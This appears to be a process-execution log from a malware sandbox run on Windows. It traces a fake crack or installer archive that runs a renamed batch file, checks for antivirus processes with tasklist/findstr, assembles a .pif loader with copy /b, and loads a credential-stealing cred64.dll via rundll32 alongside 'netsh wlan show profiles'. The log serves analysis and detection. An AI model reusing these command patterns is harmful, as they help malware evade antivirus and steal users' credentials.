"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=828 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6136 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5944 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4636 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2892 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3288 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5852 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5460 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2380 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-700.exe

"C:\Users\Admin\Downloads\winrar-x64-700.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1052

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1664

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\ee4e8f0cd20b43c5814de249fdc5ae49 /t 4172 /p 4444

C:\Users\Admin\Downloads\winrar-x64-700.exe

"C:\Users\Admin\Downloads\winrar-x64-700.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1408

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\fed27ca11eed4c58926bd3f222349c9b /t 2880 /p 5448

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\ResetPop.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\e3cafcdbf76744f383bef4c9216a41e5 /t 5344 /p 4852

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Manual_installer_v4.67877.tar"

C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\7zO0DC74C63\Crack.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1508

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move Blogs Blogs.bat & Blogs.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe

"C:\Users\Admin\AppData\Local\Temp\7zO0DC83053\Sеtup_v3.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 2

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Neil + Dust + Mercury + Infrared + Norfolk + Quoted + Classics + Interests + Iraq 2\Jr.pif

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Depression + Learned + Bind + Rapid 2\t

C:\Users\Admin\AppData\Local\Temp\2\Jr.pif

2\Jr.pif 2\t

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\0944c0b9532d40e0975f9b8d58251996 /t 2856 /p 3280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=2464 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5688 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5684 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2396 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5468 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5292 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=5332 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=5460 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3540 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbc8b39758,0x7ffbc8b39768,0x7ffbc8b39778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3276 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3968 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\2\RegAsm.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5164 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1600

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5372 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4892 --field-trial-handle=1836,i,15335679528855565204,2605671269193512019,131072 /prefetch:8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 652

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 896 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1248

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb9759758,0x7ffbb9759768,0x7ffbb9759778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4676 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 864 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1452

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5088 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5408 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3340 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4888 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

